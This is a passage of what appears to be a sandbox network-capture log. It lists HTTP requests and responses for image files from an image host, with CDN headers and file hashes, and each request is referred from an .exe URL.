x-oss-storage-class: Standard
Content-MD5: 2D5FNrWzfJEVC/PhShrHVw==
x-oss-server-time: 47
Via: cache39.l2cn1823[0,304-0,H], cache9.l2cn1823[1,0], kunlun3.cn556[0,200-0,H], kunlun7.cn556[6,0]
Age: 4133
Ali-Swift-Global-Savetime: 1541123948
X-Cache: HIT TCP_MEM_HIT dirn:11:543373221
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164624265069e


--- Additional Info ---
Magic:  GIF image data, version 89a, 980 x 60
Size:   141176
Md5:    d83e4536b5b37c91150bf3e14a1ac757
Sha1:   c47b75a90b97ef771b333db7517abac4d1dcf5db
Sha256: 88f17e10d6bd58de6fcd9e16425abfe198bb38bfc9a9e3749caa05d82f9d8c70
                                        
GET /uploads/f560136e2c2ab5bf1371b2ad91dba9fa.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 25264
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:42:11 GMT
x-oss-request-id: 5CFA69B3737FAA3D993680FB
Accept-Ranges: bytes
Etag: "6CDE7E19253B8C7033138EE508E16545"
Last-Modified: Fri, 07 Sep 2018 06:26:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2963734069645620425
x-oss-storage-class: Standard
Content-MD5: bN5+GSU7jHAzE47lCOFlRQ==
x-oss-server-time: 3
Via: cache10.l2cm10-1[22,304-0,H], cache35.l2cm10-1[23,0], kunlun1.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 1532
Ali-Swift-Global-Savetime: 1541105593
X-Cache: HIT TCP_MEM_HIT dirn:9:669261338
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164631895306e


--- Additional Info ---
Magic:  GIF image data, version 89a, 240 x 540
Size:   25264
Md5:    6cde7e19253b8c7033138ee508e16545
Sha1:   dd642058e25b1d35935be01251fc6407c4630468
Sha256: cbadf45d19c24b4b525845bae70bd14c2c6175ac5ab89c54793f74e1b94587fb
                                        
GET /uploads/831fcad2aa4b23abb8379c39d7a2444e.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 7467
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:10:50 GMT
x-oss-request-id: 5CFA625ABE768F465A0A9C4F
Accept-Ranges: bytes
Etag: "7951560C14F06D5FC17209083C1D4549"
Last-Modified: Fri, 07 Sep 2018 06:25:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 2709484068056267556
x-oss-storage-class: Standard
Content-MD5: eVFWDBTwbV/BcgkIPB1FSQ==
x-oss-server-time: 6
Via: cache10.l2et2-1[0,304-0,H], cache15.l2et2-1[1,0], kunlun4.cn556[0,200-0,H], kunlun7.cn556[2,0]
Age: 3413
Ali-Swift-Global-Savetime: 1541079148
X-Cache: HIT TCP_MEM_HIT dirn:11:731897020
X-Swift-SaveTime: Fri, 07 Jun 2019 14:01:16 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164634505385e


--- Additional Info ---
Magic:  GIF image data, version 89a, 39 x 268
Size:   7467
Md5:    7951560c14f06d5fc17209083c1d4549
Sha1:   779ca9043a658d07e990b9b06dbe895ca356621f
Sha256: 7b71d580d662edcbce14d09e051c9cdd6e44c5a76908bcc1763ad1c4e4497d1b
                                        
GET /uploads/f37d901910f19b0af5166732057cb55a.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 3181
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:27:15 GMT
x-oss-request-id: 5CFA5823B007B7650739BB88
Accept-Ranges: bytes
Etag: "ACD657D8DF9241A153133CDBC926F4B0"
Last-Modified: Fri, 07 Sep 2018 03:03:24 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 4294663466348140134
x-oss-storage-class: Standard
Content-MD5: rNZX2N+SQaFTEzzbySb0sA==
x-oss-server-time: 29
Via: cache47.l2cn1823[0,304-0,H], cache19.l2cn1823[1,0], kunlun2.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 6028
Ali-Swift-Global-Savetime: 1545059232
X-Cache: HIT TCP_MEM_HIT dirn:10:425034411
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:44 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164636995492e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 50
Size:   3181
Md5:    acd657d8df9241a153133cdbc926f4b0
Sha1:   3510be93a9e851aa533ad47cc70e6ec91c5c8be0
Sha256: fcb2f2759f42d40e5176e005f15482e629e97a1ef6117e2bf25959440e3f7b3f
                                        
GET /uploads/3d414ea885893bf375a872f619974e59.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 7291
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:25:19 GMT
x-oss-request-id: 5CFA57AF3DD124047C7CCEE2
Accept-Ranges: bytes
Etag: "F1BDB76A9D3BD20B968BD8E95CE2CD52"
Last-Modified: Fri, 07 Sep 2018 03:06:23 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9850675076093785494
x-oss-storage-class: Standard
Content-MD5: 8b23ap070guWi9jpXOLNUg==
x-oss-server-time: 2
Via: cache6.l2cn1819[0,304-0,H], cache19.l2cn1819[0,0], kunlun8.cn556[0,200-0,H], kunlun7.cn556[8,0]
Age: 6144
Ali-Swift-Global-Savetime: 1541064177
X-Cache: HIT TCP_MEM_HIT dirn:0:581796476
X-Swift-SaveTime: Fri, 07 Jun 2019 13:19:53 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164639525605e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   7291
Md5:    f1bdb76a9d3bd20b968bd8e95ce2cd52
Sha1:   820240b32d30412dd85fe831ada1495d1a71d3cb
Sha256: 1709f2b77f7fc04ed2bef51f00860c2d504727e15dbcb0aa2eafae2e027f4aea
                                        
GET /uploads/b607f5c525da30c92fe28fb9b5a75494.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6835
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:54:26 GMT
x-oss-request-id: 5CFA5E82F746B8FA6202EE50
Accept-Ranges: bytes
Etag: "EFC3D4F0D0C2D35C69557E477B2E4FC6"
Last-Modified: Fri, 07 Sep 2018 12:31:28 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 8126930978737904887
x-oss-storage-class: Standard
Content-MD5: 78PU8NDC01xpVX5Hey5Pxg==
x-oss-server-time: 15
Via: cache29.l2cn1823[0,304-0,H], cache30.l2cn1823[1,0], kunlun10.cn556[0,200-0,H], kunlun7.cn556[8,0]
Age: 4398
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:9:610914861
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:42 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164642145703e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6835
Md5:    efc3d4f0d0c2d35c69557e477b2e4fc6
Sha1:   2e00fe60321983aa9793dfbb747037ac625e15eb
Sha256: c2ef12c881a522f618cb850034fc17c2f4509ffe6a379247710777f2ada5d47d
                                        
GET /uploads/b76d637215dbe1935631deb860e9adcd.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6529
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:52:24 GMT
x-oss-request-id: 5CFA6C183CCD2680572F84A8
Accept-Ranges: bytes
Etag: "4446BE8C5F8FE54AE0541FE8C9B5060A"
Last-Modified: Fri, 07 Sep 2018 03:06:23 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11507538434270433860
x-oss-storage-class: Standard
Content-MD5: REa+jF+P5UrgVB/oybUGCg==
x-oss-server-time: 7
Via: cache41.l2cn1823[29,304-0,H], cache43.l2cn1823[30,0], kunlun7.cn556[0,200-0,H], kunlun7.cn556[0,0]
Age: 920
Ali-Swift-Global-Savetime: 1541071892
X-Cache: HIT TCP_MEM_HIT dirn:9:451801679
X-Swift-SaveTime: Fri, 07 Jun 2019 13:52:24 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164644735863e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6529
Md5:    4446be8c5f8fe54ae0541fe8c9b5060a
Sha1:   eb4e187594203173fc7a4ed8281f228faac5b113
Sha256: d27415d507a4a1f0ef0f64df59792c37074c57c1478af438ecc68566b0c222d2
                                        
GET /uploads/4320e07e2fb45bb0318256d3bbaf05ed.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 345954
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:33:14 GMT
x-oss-request-id: 5CFA598A94D2DC78C5EE7F6E
Accept-Ranges: bytes
Etag: "354384A4EF3BF6CE2F5F94C1096DEB9D"
Last-Modified: Mon, 01 Apr 2019 06:15:45 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11885866581657763957
x-oss-storage-class: Standard
Content-MD5: NUOEpO879s4vX5TBCW3rnQ==
x-oss-server-time: 61
Via: cache30.l2et2-1[0,304-0,H], cache10.l2et2-1[1,0], kunlun5.cn556[0,200-0,H], kunlun8.cn556[1,0]
Ali-Swift-Global-Savetime: 1554719069
Age: 5669
X-Cache: HIT TCP_MEM_HIT dirn:10:680937807
X-Swift-SaveTime: Fri, 07 Jun 2019 13:28:15 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72615599164630814146e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   345954
Md5:    354384a4ef3bf6ce2f5f94c1096deb9d
Sha1:   4d08425d4e9d5c11bcc6ea457970458b85dd4366
Sha256: 01224f7fbe46e62152f2b8bc9c11935c17fcd2f41a8ac2ed36ebe6150ec720cd
                                        
GET /uploads/8c3615e38c44d19f3156fd7dadf5edca.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 157474
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:54:18 GMT
x-oss-request-id: 5CFA5E7AB1F7903EF03AC1FE
Accept-Ranges: bytes
Etag: "B90017BB17B86469793C05065C2D6D4E"
Last-Modified: Thu, 11 Apr 2019 02:22:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 15527053532564001875
x-oss-storage-class: Standard
Content-MD5: uQAXuxe4ZGl5PAUGXC1tTg==
x-oss-server-time: 40
Via: cache43.l2cn1823[0,304-0,H], cache22.l2cn1823[1,0], kunlun10.cn556[0,200-0,H], kunlun6.cn556[1,0]
Ali-Swift-Global-Savetime: 1554949894
Age: 4403
X-Cache: HIT TCP_MEM_HIT dirn:0:123837880
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164610835946e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   157474
Md5:    b90017bb17b86469793c05065c2d6d4e
Sha1:   31a99a9be4fa4f538e26ef76b50806792c814f52
Sha256: 452408ec45f4c7ae53591c6026c3a01b2960ad2476f7df0d4676f8f2a03a689f
                                        
GET /uploads/e3be46ea3f70d518d5d655316989ccf6.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 7432
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:55:19 GMT
x-oss-request-id: 5CFA5EB7BE0EBC296F486690
Accept-Ranges: bytes
Etag: "AE4822DAAD08B086FBA0B1753FE5C943"
Last-Modified: Thu, 06 Sep 2018 09:13:40 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 14407415823828087238
x-oss-storage-class: Standard
Content-MD5: rkgi2q0IsIb7oLF1P+XJQw==
x-oss-server-time: 17
Via: cache22.l2cn1819[0,304-0,H], cache50.l2cn1819[0,0], kunlun1.cn556[0,200-0,H], kunlun8.cn556[1,0]
Age: 4345
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:11:744234486
X-Swift-SaveTime: Fri, 07 Jun 2019 13:20:51 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72615599164648864759e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 79
Size:   7432
Md5:    ae4822daad08b086fba0b1753fe5c943
Sha1:   5840f314811733d0aa0d5a8324d2b81f419930a4
Sha256: a1a73f2f4d7ef275ee8e593c593b33f8f0872d034144f987f17f36f3894785c0
                                        
GET /uploads/d513716df9ee9c021a0a398c231f2dfc.jpg HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: Tengine
Content-Length: 23702
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:31:59 GMT
x-oss-request-id: 5CFA674F3861C53FA1F7F6D3
Accept-Ranges: bytes
Etag: "82872F953D4854208F90CAF10A86CAEB"
Last-Modified: Fri, 07 Sep 2018 03:08:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 14478386051354111384
x-oss-storage-class: Standard
Content-MD5: gocvlT1IVCCPkMrxCobK6w==
x-oss-server-time: 50
Via: cache12.l2et2-1[26,304-0,H], cache14.l2et2-1[28,0], kunlun5.cn556[0,200-0,H], kunlun6.cn556[1,0]
Age: 2146
Ali-Swift-Global-Savetime: 1541064176
X-Cache: HIT TCP_MEM_HIT dirn:11:708239140
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164650977446e


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   23702
Md5:    82872f953d4854208f90caf10a86caeb
Sha1:   642da262ac9d0448720e3356fbc777d5ecd7f273
Sha256: d23c473345e74300c03c15f53c391a5f092c502934a0b962561699f159cdb443
                                        
GET /uploads/bd448c08ef8544f717e6375cf153c361.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 7081
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:18:42 GMT
x-oss-request-id: 5CFA64325D25B1E78BF0C5CD
Accept-Ranges: bytes
Etag: "B50A517009A7069DF753010A8E370DF0"
Last-Modified: Sat, 10 Nov 2018 01:50:53 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 1385452570929880889
x-oss-storage-class: Standard
Content-MD5: tQpRcAmnBp33UwEKjjcN8A==
x-oss-server-time: 2
Via: cache18.l2cm10-1[23,304-0,H], cache32.l2cm10-1[24,0], kunlun2.cn556[0,200-0,H], kunlun6.cn556[1,0]
Age: 2943
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:0:162534474
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:42 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164656227649e


--- Additional Info ---
Magic:  GIF image data, version 89a, 334 x 81
Size:   7081
Md5:    b50a517009a7069df753010a8e370df0
Sha1:   d8bcc95f60cf23660e7b9262f7a15c461e8f21f4
Sha256: b63e9d54f8a411cce04a6eec650f153d569954f72fd816e421436656e3b16dfc
                                        
GET /uploads/fd9a878938755a852faa2dfec51a63b3.jpg HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: Tengine
Content-Length: 14242
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:27:15 GMT
x-oss-request-id: 5CFA5823F746B8FA62D9CDC2
Accept-Ranges: bytes
Etag: "73C2658BD87F442DBE3688A4FE48352C"
Last-Modified: Fri, 07 Sep 2018 03:08:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10315735259197256842
x-oss-storage-class: Standard
Content-MD5: c8Jli9h/RC2+Noik/kg1LA==
x-oss-server-time: 21
Via: cache16.l2cn1823[0,304-0,H], cache13.l2cn1823[1,0], kunlun9.cn556[0,200-0,H], kunlun7.cn556[0,0]
Age: 6030
Ali-Swift-Global-Savetime: 1541064178
X-Cache: HIT TCP_MEM_HIT dirn:10:251011529
X-Swift-SaveTime: Fri, 07 Jun 2019 13:19:53 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164656786351e


--- Additional Info ---
Magic:  PNG image, 333 x 79, 8-bit/color RGBA, non-interlaced
Size:   14242
Md5:    73c2658bd87f442dbe3688a4fe48352c
Sha1:   f5a31ed734b80202b74f6d296766ae2e8bbd7874
Sha256: 7156ba4542717f84d7acea3aef40754a8fb5d7ce99452ebf9c3a1d5b5f15e5ea
                                        
GET /uploads/5bcd8d72c7e04fed54071b9ad48ce4b9.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6877
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:42:47 GMT
x-oss-request-id: 5CFA5BC72D5BE18B642B2DA7
Accept-Ranges: bytes
Etag: "5335A00A7D332D1E4DF3075BC889062F"
Last-Modified: Fri, 07 Sep 2018 12:32:43 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 16101740571007436106
x-oss-storage-class: Standard
Content-MD5: UzWgCn0zLR5N8wdbyIkGLw==
x-oss-server-time: 174
Via: cache6.l2cn1823[0,304-0,H], cache16.l2cn1823[0,0], kunlun5.cn556[0,200-0,H], kunlun6.cn556[0,0]
Age: 5098
Ali-Swift-Global-Savetime: 1541070475
X-Cache: HIT TCP_MEM_HIT dirn:11:687065101
X-Swift-SaveTime: Fri, 07 Jun 2019 13:31:59 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164658847737e


--- Additional Info ---
Magic:  GIF image data, version 89a, 334 x 81
Size:   6877
Md5:    5335a00a7d332d1e4df3075bc889062f
Sha1:   002e7d07d3dcc3563e0805a34bacece0ec3b9884
Sha256: 7f654ea8280abf720ec75248bbf90c9f5f4b750501f0800a361ded2344bd742c
                                        
GET /uploads/8dff3145eec719dab614bca26f7f5f0f.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 7098
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:51:56 GMT
x-oss-request-id: 5CFA5DEC88FF7D9C53CB0D62
Accept-Ranges: bytes
Etag: "8C7F1757E238A300A0F2A3E1EC9C9E72"
Last-Modified: Fri, 07 Sep 2018 03:13:05 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11097520384842986539
x-oss-storage-class: Standard
Content-MD5: jH8XV+I4owCg8qPh7Jyecg==
x-oss-server-time: 3
Via: cache38.l2cn1823[0,304-0,H], cache4.l2cn1823[1,0], kunlun6.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 4549
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:11:114537650
X-Swift-SaveTime: Fri, 07 Jun 2019 13:20:51 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164659296437e


--- Additional Info ---
Magic:  GIF image data, version 89a, 334 x 81
Size:   7098
Md5:    8c7f1757e238a300a0f2a3e1ec9c9e72
Sha1:   4ebd5d75c390798a0df36482f0e9e8effc205cb0
Sha256: c67f63ade8a4e2136eba9715a6d4a5d69d703367ae1617f0e3538dba99d97803
                                        
GET /uploads/2235a4f5f5fe9c9b4bd11373cf0f8475.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6595
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:34:22 GMT
x-oss-request-id: 5CFA67DE6A3ADCC1EB1171A0
Accept-Ranges: bytes
Etag: "8B999CBA36C4F3980B2AF1826F1975C5"
Last-Modified: Fri, 07 Sep 2018 03:13:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9653090712213416743
x-oss-storage-class: Standard
Content-MD5: i5mcujbE85gLKvGCbxl1xQ==
x-oss-server-time: 32
Via: cache41.l2cn1819[0,304-0,H], cache10.l2cn1819[0,0], kunlun10.cn556[0,200-0,H], kunlun6.cn556[4,0]
Age: 2004
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:9:610182470
X-Swift-SaveTime: Fri, 07 Jun 2019 13:52:23 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164661457843e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6595
Md5:    8b999cba36c4f3980b2af1826f1975c5
Sha1:   5ec88fb78472a6eb49f63ba39a3f84a2479428df
Sha256: 457c4944dae013bee89c23fdee35aeba1a2ea3bf828e427a80de5bfe0adecd18
                                        
GET /uploads/dea7889453f54f7b1891e9bf689ce3f4.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 11695
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:52:23 GMT
x-oss-request-id: 5CFA6C173CCD2680572F81F0
Accept-Ranges: bytes
Etag: "A5F38E9F948E8A131A8E0C526375B41E"
Last-Modified: Fri, 07 Sep 2018 03:06:24 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 11636942741079933086
x-oss-storage-class: Standard
Content-MD5: pfOOn5SOihMajgxSY3W0Hg==
x-oss-server-time: 10
